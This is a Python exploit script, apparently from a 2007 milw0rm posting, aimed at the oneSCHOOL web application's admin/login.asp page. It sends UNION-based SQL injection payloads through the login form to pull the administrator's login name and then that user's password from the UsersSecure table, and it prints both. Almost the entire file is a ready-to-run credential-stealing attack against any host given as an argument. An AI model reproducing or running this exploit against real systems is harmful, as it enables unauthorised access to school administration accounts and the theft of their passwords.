54 lines
No EOL
1.5 KiB
Python
Executable file
54 lines
No EOL
1.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
#oneSCHOOL admin/login.asp SQL Injection explot (for all versions)
|
|
#by Guga360.
|
|
|
|
import urllib
|
|
from sys import argv
|
|
|
|
query = {'txtOperation':'Login','txtLoginID':"""
|
|
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}
|
|
|
|
queryx = urllib.urlencode(query)
|
|
|
|
if len(argv)<>2:
|
|
print """
|
|
**********
|
|
|
|
Usage:
|
|
oneSCHOOLxpl.py [host]
|
|
|
|
[+] Exploiting...
|
|
|
|
[+] User: admin
|
|
[+] Password: 123
|
|
|
|
*******************
|
|
"""
|
|
else:
|
|
try:
|
|
print '\n[+] Exploting...\n'
|
|
host = argv[1]
|
|
if host[0:7]<>'http://':
|
|
host = 'http://'+host
|
|
url = urllib.urlopen(host+'/admin/login.asp', queryx)
|
|
url = url.read()
|
|
url = url.split()
|
|
name = url.index('varchar')+2
|
|
name = url[name]
|
|
name = name.replace("'","")
|
|
print '[+] User: ' + name
|
|
query2 = query.copy()
|
|
query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
|
|
query2 = urllib.urlencode(query2)
|
|
url = urllib.urlopen(host+'/admin/login.asp', query2)
|
|
url = url.read()
|
|
url = url.split()
|
|
passw = url.index('varchar')+2
|
|
passw = url[passw]
|
|
passw = passw.replace("'","")
|
|
print '[+] Pass: '+passw
|
|
except:
|
|
print '[+] Not vulnerable!'
|
|
|
|
# milw0rm.com [2007-12-31] |